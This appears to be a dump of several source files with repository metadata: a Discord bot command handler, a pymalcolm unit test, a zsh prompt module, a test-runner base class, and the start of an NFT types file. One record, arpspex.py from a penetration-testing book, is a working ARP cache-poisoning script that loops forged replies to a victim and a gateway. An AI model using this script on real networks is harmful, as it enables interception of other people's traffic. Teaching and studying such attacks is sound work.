hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f659b0d045cb305375adfbb54ef5b317d1bd67ed | 8,327 | py | Python | system.py | Attachment-Studios/PackedBerry | cb1d47c00cce8d31d6d1e95b1ec2deb330a184e0 | [
"CNRI-Python"
] | null | null | null | system.py | Attachment-Studios/PackedBerry | cb1d47c00cce8d31d6d1e95b1ec2deb330a184e0 | [
"CNRI-Python"
] | null | null | null | system.py | Attachment-Studios/PackedBerry | cb1d47c00cce8d31d6d1e95b1ec2deb330a184e0 | [
"CNRI-Python"
] | null | null | null | # PackedBerry System
import requests
import random
import os
import youtubesearchpython
def search_video(query:str):
videosSearch = youtubesearchpython.VideosSearch(str(query), limit = 1)
return videosSearch.result()
def get_video_data(query:dict):
r = {}
d = search_video(query)
for _ in d:
l = d[_]
for e in l:
f = e
for i in f:
if i in ['link', 'title', 'duration', 'viewCoutn']:
r.update({i : f[i]})
return r
def get_title(url: str):
html = requests.get(url).text
title_separator = html.split("<title>")
title = title_separator[1].split("</title>")[0]
return title
vfile = open("data/version", "r")
version = vfile.read()
vfile.close()
hfile = open("data/help", "r")
help_data = hfile.read()
hfile.close()
wfile = open("data/whatsnew", "r")
whatsnew = wfile.read()
wfile.close()
def mute(uid, mute_list, guild_id, mute_server):
id_match = False
for elem in mute_list:
if str(elem) == str(uid):
id_match = True
break
server_match = False
for elem in mute_server:
if str(elem) == str(guild_id):
server_match = True
break
if id_match and server_match:
return True
else:
return False
def out(message, refname, client):
try:
msg = message.content.lower().split(" ")
out = ""
delete = False
connectVoice = False
voiceChannel = ""
song_url = ""
calls = refname
repeat = 1
mutelist = []
unmutelist = []
if msg[0] in refname[1]:
try:
if msg[1] in ["ver", "version"]:
out = version
elif msg[1] in ["whatsnew", "wn"]:
out = whatsnew
elif msg[1] == "help":
if len(msg) < 3:
help_file = open('data/help', 'r')
help_data = help_file.read()
help_file.close()
out = str(help_data)
else:
help_file = open('data/__help__', 'r')
help_data = help_file.read().split("***")
help_data.remove("")
help_file.close()
for _ in help_data:
list_ = _.split("\n")
list_.remove('')
if len(list_) > 0:
if list_[0] == msg[2]:
out = str(_)
break
if out == "":
out = "```yml\n*unavailable```"
elif msg[1] == "ping":
out = f"<@{message.author.id}>"
elif msg[1] == "sitename":
try:
site_url = str(message.content.split(" ")[2])
try:
title = get_title(site_url)
except:
title = "???"
out = title
except:
out = "Please provide URL."
elif msg[1] in ["connect", "join", "vibe"]:
try:
_msg = message.content.split(' ')
del _msg[0]
del _msg[0]
c = " ".join(_msg)
if c.replace(' ', '') == "":
out = "Please enter a valid channel name."
else:
voiceChannel = str(c)
out = f"Connected to {c}."
connectVoice = "<#>"
except Exception as e:
print(e)
elif msg[1] == "vibe-url":
try:
try:
try:
voiceChannel = str(message.content).replace( str(message.content.split(" ")[0]) + " " + str(message.content.split(" ")[1]) + " " + str(message.content.split(" ")[2] + " "), "" )
song_url = str(message.content.split(" ")[2])
try:
title = get_title(song_url)
except:
title = "???"
out = "Now vibing on " + title + "(<" + song_url + ">)!!!"
connectVoice = True
except:
out = "Error."
except:
out = "Please provide a voice channel to vibe in!"
except:
out = "Please provide an url to vibe on!"
elif msg[1] == "vibe-name":
try:
try:
try:
del msg[0]
del msg[0]
search_text = " ".join(msg)
if search_text.replace(' ', '') == '':
out = 'Search Text can not be empty.'
else:
song_url = str(get_video_data(search_text)['link'])
try:
title = get_title(song_url)
except:
title = "???"
out = "Now vibing on " + title + "(<" + song_url + ">)!!!"
connectVoice = True
except:
out = "Error."
except:
out = "Please provide a voice channel to vibe in!"
except:
out = "Please provide an url to vibe on!"
elif msg[1] == "novibe":
connectVoice = "-"
out = "Not vibing anymore."
elif msg[1] == "pausevibe":
connectVoice = "||"
out = "Waiting till start vibing again."
elif msg[1] == "resumevibe":
connectVoice = ">"
out = "Resuming vibing again."
elif msg[1] == "donevibe":
connectVoice = "<"
out = "Stopped vibing."
elif msg[1] == "spam":
if str(message.guild.id) in os.listdir('no-spam'):
out = "You can not use `spam` command in this server. To enable it type `<prefix> set-spam on`. Note by default if already wasn't set to, then spam max limit is 25. Be careful."
else:
try:
try:
try:
sf = open(f'set-spam/{message.guild.id}', 'r')
spam_limit = int(sf.read())
sf.close()
except:
spam_limit = 25
if int(msg[2]) <= spam_limit:
spam_text = ""
try:
spam_text = str(message.content).replace( str(message.content.split(" ")[0]) + " " + str(message.content.split(" ")[1]) + " " + str(message.content.split(" ")[2] + " "), "" )
except:
spam_text = ""
if spam_text.replace(" ", "") == '':
out = "Please provide text to spam."
else:
out = spam_text
repeat = int(msg[2])
else:
out = f"Spam amount limit is 0 to {spam_limit} only."
except:
out = "Spam amount should be a number."
except:
out = "Please specify an amount to spam."
elif msg[1] == "call":
try:
if str(msg[2]) not in calls[1]:
calls[1].append(str(msg[2]))
out = 'Added name option - ' + str(message.content.split(' ')[2]) + '. Now you can use ' + str(message.content.split(' ')[2]) + ' as prefix to start a PackedBerry command.'
except:
all_names = "```"
called = []
for name in calls[1]:
if name not in called:
all_names = all_names + '\n' + str(name)
called.append(name)
all_names = all_names + '\n```'
out = str(all_names)
elif msg[1] == "nocall":
try:
if str(msg[2]) in calls[1]:
calls[1].remove(str(msg[2]))
if str(msg[2]) in calls[0]:
out = 'Can not remove system default names!'
else:
out = 'Removed name option - ' + str(message.content.split(' ')[2]) + '. Now you can not use ' + str(message.content.split(' ')[2]) + ' as prefix to start a PackedBerry command.'
for name in calls[0]:
if name not in calls[1]:
calls[1].append(name)
except:
out = 'Please provide a name!'
elif msg[1] == "mute":
try:
if message.author.guild_permissions.administrator:
id = str(msg[2]).replace('<', '').replace('>', '').replace('!', '').replace('@', '')
if id == str(781701773713997824):
out = ["Dare you talk to my creator like that again. :rage:", "You can not mute a god.", "This is an action of Violence against PackedBerry."][random.randint(0, 2)]
elif id == str(message.author.id):
out = 'Are you serious or just want to punish yourself?'
else:
mutelist.append(str(msg[2]).replace('<', '').replace('>', '').replace('!', '').replace('@', ''))
out = f'{msg[2]} was muted.'
else:
out = 'YOOOOOOOOOOOOOOOOLLLLLLLLlllll! You Not The Admin!'
except:
out = 'Please provide user to mute.'
elif msg[1] == "unmute":
try:
if message.author.guild_permissions.administrator:
unmutelist.append(str(msg[2]).replace('<', '').replace('>', '').replace('!', '').replace('@', ''))
out = f'{msg[2]} was unmuted.'
else:
out = 'YOOOOOOOOOOOOOOOOLLLLLLLLlllll! You Not The Admin!'
except:
out = 'Please provide user to unmute.'
elif msg[1] == "img":
try:
out = f"https://picsum.photos/seed/{ str(msg[2]) }/1920/1080"
except:
out = f"https://picsum.photos/seed/{ random.randint(1, 1000000) }/1920/1080"
except:
out = "Yes!?"
else:
pass
return_value = [
not(out == ""),
out,
delete,
connectVoice,
voiceChannel,
song_url,
repeat,
calls,
mutelist,
unmutelist
]
return return_value
except:
pass
| 29.424028 | 185 | 0.549418 | 1,067 | 8,327 | 4.20806 | 0.200562 | 0.016036 | 0.03029 | 0.058797 | 0.36147 | 0.335412 | 0.295991 | 0.257016 | 0.257016 | 0.257016 | 0 | 0.019357 | 0.286538 | 8,327 | 282 | 186 | 29.528369 | 0.736408 | 0.002162 | 0 | 0.324627 | 0 | 0.003731 | 0.21635 | 0.016133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018657 | false | 0.007463 | 0.014925 | 0 | 0.05597 | 0.003731 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f65acd232e8fbfd6fb6fb9d47b48f78f7cfaabe4 | 2,623 | py | Python | tests/test_modules/test_system/test_iociconpart.py | hir12111/pymalcolm | 689542711ff903ee99876c40fc0eae8015e13314 | [
"Apache-2.0"
] | 11 | 2016-10-04T23:11:39.000Z | 2022-01-25T15:44:43.000Z | tests/test_modules/test_system/test_iociconpart.py | hir12111/pymalcolm | 689542711ff903ee99876c40fc0eae8015e13314 | [
"Apache-2.0"
] | 153 | 2016-06-01T13:31:02.000Z | 2022-03-31T11:17:18.000Z | tests/test_modules/test_system/test_iociconpart.py | hir12111/pymalcolm | 689542711ff903ee99876c40fc0eae8015e13314 | [
"Apache-2.0"
] | 16 | 2016-06-10T13:45:27.000Z | 2020-10-24T13:45:04.000Z | import os
import unittest
from mock import ANY, patch
from malcolm.core import Context, Process, StringMeta
from malcolm.modules.ca.util import catools
from malcolm.modules.scanning.controllers import RunnableController
from malcolm.modules.system.parts import IocIconPart
defaultIcon = ""
with open(
os.path.split(__file__)[0] + "/../../../malcolm/modules/system/icons/epics-logo.svg"
) as f:
defaultIcon = f.read()
vxIcon = ""
with open(
os.path.split(__file__)[0] + "/../../../malcolm/modules/system/icons/vx_epics.svg"
) as f:
vxIcon = f.read()
linuxIcon = ""
with open(
os.path.split(__file__)[0]
+ "/../../../malcolm/modules/system/icons/linux_epics.svg"
) as f:
linuxIcon = f.read()
winIcon = ""
with open(
os.path.split(__file__)[0] + "/../../../malcolm/modules/system/icons/win_epics.svg"
) as f:
winIcon = f.read()
class MockPv(str):
ok = True
class TestIocIconPart(unittest.TestCase):
def add_part_and_start(self):
self.icon = IocIconPart(
"ICON",
os.path.split(__file__)[0]
+ "/../../../malcolm/modules/system/icons/epics-logo.svg",
)
self.c1.add_part(self.icon)
self.p.add_controller(self.c1)
self.p.start()
def setUp(self):
self.p = Process("process1")
self.context = Context(self.p)
self.c1 = RunnableController(mri="SYS", config_dir="/tmp", use_git=False)
def tearDown(self):
self.p.stop(timeout=1)
@patch("malcolm.modules.ca.util.CAAttribute")
def test_has_pv(self, CAAttribute):
self.add_part_and_start()
CAAttribute.assert_called_once_with(
ANY,
catools.DBR_STRING,
"",
"ICON:KERNEL_VERS",
throw=False,
callback=self.icon.update_icon,
)
assert isinstance(CAAttribute.call_args[0][0], StringMeta)
meta = CAAttribute.call_args[0][0]
assert meta.description == "Host Architecture"
assert not meta.writeable
assert len(meta.tags) == 0
def test_adds_correct_icons(self):
self.add_part_and_start()
assert self.context.block_view("SYS").icon.value == defaultIcon
arch = MockPv("windows")
self.icon.update_icon(arch)
assert self.context.block_view("SYS").icon.value == winIcon
arch = MockPv("WIND")
self.icon.update_icon(arch)
assert self.context.block_view("SYS").icon.value == vxIcon
arch = MockPv("linux")
self.icon.update_icon(arch)
assert self.context.block_view("SYS").icon.value == linuxIcon
| 28.51087 | 88 | 0.629813 | 329 | 2,623 | 4.851064 | 0.322188 | 0.078947 | 0.075188 | 0.046992 | 0.350251 | 0.300125 | 0.300125 | 0.300125 | 0.276316 | 0.276316 | 0 | 0.007393 | 0.226458 | 2,623 | 91 | 89 | 28.824176 | 0.779202 | 0 | 0 | 0.202703 | 0 | 0 | 0.14411 | 0.11361 | 0 | 0 | 0 | 0 | 0.121622 | 1 | 0.067568 | false | 0 | 0.094595 | 0 | 0.202703 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f65d05ee6da3acc0082713c25be1c98fa8f80dcf | 763 | py | Python | Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/arpspex.py | kaisaryousuf/Python-Penetration-Testing-Essentials-Second-Edition | f2a666b62826b4adc334a8e69ccbfe20b5cf12c2 | [
"MIT"
] | 18 | 2018-06-04T08:27:25.000Z | 2022-02-24T02:08:51.000Z | Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/arpspex.py | kaisaryousuf/Python-Penetration-Testing-Essentials-Second-Edition | f2a666b62826b4adc334a8e69ccbfe20b5cf12c2 | [
"MIT"
] | null | null | null | Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/arpspex.py | kaisaryousuf/Python-Penetration-Testing-Essentials-Second-Edition | f2a666b62826b4adc334a8e69ccbfe20b5cf12c2 | [
"MIT"
] | 11 | 2018-04-12T00:43:49.000Z | 2022-03-13T18:24:55.000Z | import socket
import struct
import binascii
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
s.bind(("eth0",socket.htons(0x0800)))
sor = '\x00\x0c\x29\x4f\x8e\x35'
victmac ='\x88\x53\x2e\x0a\x75\x3f'
gatemac = '\x84\x1b\x5e\x50\xc8\x6e'
code ='\x08\x06'
eth1 = victmac+sor+code #for victim
eth2 = gatemac+sor+code # for gateway
htype = '\x00\x01'
protype = '\x08\x00'
hsize = '\x06'
psize = '\x04'
opcode = '\x00\x02'
gate_ip = '10.0.0.1'
victim_ip = '10.0.0.6'
gip = socket.inet_aton ( gate_ip )
vip = socket.inet_aton ( victim_ip )
arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip
arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip
while 1:
s.send(arp_victim)
s.send(arp_gateway)
| 21.194444 | 74 | 0.711664 | 131 | 763 | 4.053435 | 0.48855 | 0.045198 | 0.037665 | 0.022599 | 0.116761 | 0.116761 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 0.115334 | 763 | 35 | 75 | 21.8 | 0.68 | 0.028834 | 0 | 0 | 0 | 0 | 0.179104 | 0.097693 | 0 | 0 | 0.016282 | 0 | 0 | 1 | 0 | false | 0 | 0.12 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f66035f56d78b423d31ea48cacdd05224e0feb79 | 1,311 | py | Python | snakypy/zshpower/prompt/sections/hostname.py | williamcanin/zshpower | 797533b60cd7f9dbd8cf2162db9a19d970a7be33 | [
"MIT"
] | 10 | 2020-04-03T20:39:44.000Z | 2021-12-09T22:26:56.000Z | snakypy/zshpower/prompt/sections/hostname.py | williamcanin/zshpower | 797533b60cd7f9dbd8cf2162db9a19d970a7be33 | [
"MIT"
] | 9 | 2021-05-15T13:26:48.000Z | 2021-11-15T07:03:00.000Z | snakypy/zshpower/prompt/sections/hostname.py | williamcanin/zshpower | 797533b60cd7f9dbd8cf2162db9a19d970a7be33 | [
"MIT"
] | 2 | 2020-04-22T08:50:11.000Z | 2021-06-23T05:03:02.000Z | from os import environ as os_environ
from socket import gethostname
from snakypy.zshpower.utils.catch import get_key
from .utils import Color, element_spacing, symbol_ssh
class Hostname:
def __init__(self, config: dict):
self.config: dict = config
self.symbol = symbol_ssh(get_key(config, "hostname", "symbol"), "")
self.hostname_enable = get_key(config, "hostname", "enable")
self.hostname_color = get_key(config, "hostname", "color")
self.hostname_prefix_color = get_key(config, "hostname", "prefix", "color")
self.hostname_prefix_text = element_spacing(
get_key(config, "hostname", "prefix", "text")
)
def __str__(self, prefix: str = "", space_elem: str = " ") -> str:
if (
get_key(self.config, "hostname", "enable") is True
or "SSH_CONNECTION" in os_environ
):
prefix = (
f"{Color(self.hostname_prefix_color)}"
f"{self.hostname_prefix_text}"
f"{Color().NONE}"
)
if "SSH_CONNECTION" in os_environ or self.hostname_enable:
return (
f"{prefix}{Color(self.hostname_color)}{self.symbol}"
f"{gethostname()}{space_elem}{Color().NONE}"
)
return ""
| 34.5 | 83 | 0.592677 | 150 | 1,311 | 4.926667 | 0.266667 | 0.129905 | 0.081191 | 0.135318 | 0.244926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.283753 | 1,311 | 37 | 84 | 35.432432 | 0.787007 | 0 | 0 | 0 | 0 | 0 | 0.218917 | 0.115942 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.133333 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f6618a1b92f87b0c01aea0561400b4b29521929e | 9,067 | py | Python | src/main/resources/templates/c/gcc/test/testUtils/AbstractTest.py | AutoscanForJavaFork/Artemis | 43a1da12e5dc6a2f54ec8c29f9f4512520fb0c46 | [
"MIT"
] | 213 | 2019-06-20T19:22:05.000Z | 2022-03-29T14:49:53.000Z | src/main/resources/templates/c/gcc/test/testUtils/AbstractTest.py | AutoscanForJavaFork/Artemis | 43a1da12e5dc6a2f54ec8c29f9f4512520fb0c46 | [
"MIT"
] | 2,992 | 2019-06-19T13:40:38.000Z | 2022-03-31T21:17:12.000Z | src/main/resources/templates/c/test/testUtils/AbstractTest.py | FreshLlamanade/Artemis | 19d971ea76e0218cc21936da567b5e2cc3c200e4 | [
"MIT"
] | 365 | 2019-07-30T11:30:58.000Z | 2022-03-22T07:23:16.000Z | from abc import ABC, abstractmethod
from traceback import print_exc
from signal import SIGALRM, SIG_IGN, alarm, signal
from datetime import datetime, timedelta
from contextlib import contextmanager
from typing import Optional, List, Dict
from os import path, makedirs
from io import TextIOWrapper
from testUtils.junit.TestSuite import TestSuite
from testUtils.junit.TestCase import TestCase, Result
from testUtils.Utils import printTester, PWrap
from testUtils.TestFailedError import TestFailedError
# Timeout handler based on: https://www.jujens.eu/posts/en/2018/Jun/02/python-timeout-function/
class AbstractTest(ABC):
"""
A abstract test that every test has to inherit from.
How to:
1. Inherit from AbstractTest
2. Override the "_run()" method.
3. Override the "_onTimeout()" method.
4. Override the "_onFailed()" method.
5. Done
"""
name: str
requirements: List[str]
timeoutSec: int
case: Optional[TestCase]
suite: Optional[TestSuite]
def __init__(self, name: str, requirements: List[str] = None, timeoutSec: int = -1):
"""
name: str
An unique test case name.
requirements: List[str]
A list of test cases names that have to finish successfully for this test to run.
Usually an execution test should have the compile test as it's requirement.
timeoutSec: int
The test case timeout in seconds,
"""
self.name = name
self.timeoutSec = timeoutSec
self.requirements = list() if requirements is None else requirements
self.case: Optional[TestCase] = None
self.suite: Optional[TestSuite] = None
def start(self, testResults: Dict[str, Result], suite: TestSuite):
"""
Starts the test run.
---
testResults: Dict[str, Result]
All test results up to this point.
suite: TestSuite
The test suite where this test should get added to.
"""
self.suite = suite
self.case = TestCase(self.name)
# Check if all test requirements (other tests) are fulfilled:
if not self.__checkTestRequirements(testResults):
printTester(f"Skipping test case '{self.name}' not all requirements ({str(self.requirements)}) are fulfilled")
self.case.message = f"Test requires other test cases to succeed first ({str(self.requirements)})"
self.case.result = Result.SKIPPED
self.case.stdout = ""
self.case.stderr = ""
self.case.time = timedelta()
self.suite.addCase(self.case)
return
startTime: datetime = datetime.now()
self._initOutputDirectory()
if self.timeoutSec > 0:
# Run with timeout:
with self.__timeout(self.timeoutSec):
try:
self._run()
except TestFailedError:
printTester(f"'{self.name}' failed.")
except TimeoutError:
self._timeout()
except Exception as e:
self.__markAsFailed(f"'{self.name}' had an internal error. {str(e)}.\nPlease report this on Moodle (Detailfragen zu Programmieraufgaben)!")
print_exc()
self._onFailed()
else:
# Run without timeout:
try:
self._run()
except TestFailedError:
printTester(f"'{self.name}' failed.")
except Exception as e:
self.__markAsFailed(f"'{self.name}' had an internal error. {str(e)}.\nPlease report this on Moodle (Detailfragen zu Programmieraufgaben)!")
print_exc()
self._onFailed()
self.case.time = datetime.now() - startTime
self.suite.addCase(self.case)
def __checkTestRequirements(self, testResults: Dict[str, Result]):
"""
Checks if all requirements (i.e. other test cases were successfull) are fulfilled.
"""
for req in self.requirements:
if (not req in testResults) or (testResults[req] != Result.SUCCESS):
return False
return True
@contextmanager
def __timeout(self, timeoutSec: int):
# Register a function to raise a TimeoutError on the signal.
signal(SIGALRM, self.__raiseTimeout)
# Schedule the signal to be sent after ``time``.
alarm(timeoutSec)
try:
yield
except TimeoutError:
pass
finally:
# Unregister the signal so it won't be triggered
# if the timeout is not reached.
signal(SIGALRM, SIG_IGN)
def __raiseTimeout(self, sigNum: int, frame):
self._onTimeout()
raise TimeoutError
def _failWith(self, msg: str):
"""
Marks the current test as failed with the given message.
Stores the complete stderr and stdout output from the run.
"""
self.__markAsFailed(msg)
self._onFailed()
raise TestFailedError(f"{self.name} failed.")
def __markAsFailed(self, msg: str):
"""
Marks the current test case as failed and loads all stdout and stderr.
"""
self.case.message = msg
self.case.result = Result.FAILURE
self.case.stdout = self._loadFullStdout()
self.case.stderr = self._loadFullStderr()
printTester(f"Test {self.name} failed with: {msg}")
def _timeout(self, msg: str = ""):
"""
Marks the current test as failed with the given optional message.
Stores the complete stderr and stdout output from the run.
Should be called once a test timeout occurred.
"""
if msg:
self.__markAsFailed(f"timeout ({msg})")
else:
self.__markAsFailed("timeout")
def __loadFileContent(self, filePath: str):
"""
Returns the content of a file specified by filePath as string.
"""
if path.exists(filePath) and path.isfile(filePath):
file: TextIOWrapper = open(filePath, "r")
content: str = file.read()
file.close()
return content
return ""
def _loadFullStdout(self):
"""
Returns the stout output of the executable.
"""
filePath: str = self._getStdoutFilePath()
return self.__loadFileContent(filePath)
def _loadFullStderr(self):
"""
Returns the stderr output of the executable.
"""
filePath: str = self._getStderrFilePath()
return self.__loadFileContent(filePath)
def _initOutputDirectory(self):
"""
Prepares the output directory for the stderr and stdout files.
"""
outDir: str = self._getOutputPath()
if path.exists(outDir) and path.isdir(outDir):
return
makedirs(outDir)
def _getOutputPath(self):
"""
Returns the output path for temporary stuff like the stderr and stdout files.
"""
return path.join("/tmp", self.suite.name, self.name)
def _getStdoutFilePath(self):
"""
Returns the path of the stdout cache file.
"""
return path.join(self._getOutputPath(), "stdout.txt")
def _getStderrFilePath(self):
"""
Returns the path of the stderr cache file.
"""
return path.join(self._getOutputPath(), "stderr.txt")
def _createPWrap(self, cmd: List[str], cwd:Optional[str] = None):
"""
Crates a new PWrap instance from the given command.
"""
return PWrap(cmd, self._getStdoutFilePath(), self._getStderrFilePath(), cwd=cwd)
def _startPWrap(self, pWrap: PWrap):
"""
Starts the PWrap execution.
Handels FileNotFoundError if for example the executable was not found or does not exist.
"""
try:
pWrap.start()
except FileNotFoundError as fe:
printTester(str(fe))
self._failWith("File not found for execution. Did compiling fail?")
except NotADirectoryError as de:
printTester(str(de))
self._failWith(f"Directory '{pWrap.cwd}' does not exist.")
except PermissionError as pe:
printTester(str(pe))
self._failWith("Missing file execution permission. Make sure it has execute rights (chmod +x <FILE_NAME>).")
@abstractmethod
def _run(self):
"""
Implement your test run here.
"""
pass
@abstractmethod
def _onTimeout(self):
"""
Called once a timeout occurres.
Should cancel all outstanding actions and free all resources.
"""
pass
@abstractmethod
def _onFailed(self):
"""
Called once the test failed via "_failWith(msg: str)".
Should cancel all outstanding actions and free all allocated resources.
"""
pass
| 32.851449 | 159 | 0.598654 | 991 | 9,067 | 5.399596 | 0.275479 | 0.020931 | 0.00841 | 0.013455 | 0.224444 | 0.173239 | 0.164642 | 0.130817 | 0.114745 | 0.114745 | 0 | 0.002089 | 0.313555 | 9,067 | 275 | 160 | 32.970909 | 0.857648 | 0.251792 | 0 | 0.255319 | 0 | 0.014184 | 0.116513 | 0.015233 | 0 | 0 | 0 | 0 | 0 | 1 | 0.141844 | false | 0.028369 | 0.085106 | 0 | 0.35461 | 0.078014 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f66373f676f7fc2f78b1b39bfeacfa7e3aaf7994 | 3,574 | py | Python | thirdweb/types/nft.py | nftlabs/nftlabs-sdk-python | ea533142dc0881872b347cd8ce635dc0bfff3153 | [
"Apache-2.0"
] | 30 | 2021-10-31T13:17:58.000Z | 2022-02-04T13:41:13.000Z | thirdweb/types/nft.py | nftlabs/nftlabs-sdk-python | ea533142dc0881872b347cd8ce635dc0bfff3153 | [
"Apache-2.0"
] | 36 | 2021-11-03T20:30:38.000Z | 2022-02-14T10:15:40.000Z | thirdweb/types/nft.py | nftlabs/nftlabs-sdk-python | ea533142dc0881872b347cd8ce635dc0bfff3153 | [
"Apache-2.0"
] | 10 | 2021-11-10T19:59:41.000Z | 2022-01-21T21:26:55.000Z | from dataclasses import dataclass
from typing import Any, Dict, Optional, Union
@dataclass
class NFTMetadataInput:
"""
The metadata of an NFT to mint
You can use the NFTMetadataInput.from_json(json) method to create
an instance of this class from a dictionary.
:param name: The name of the NFT
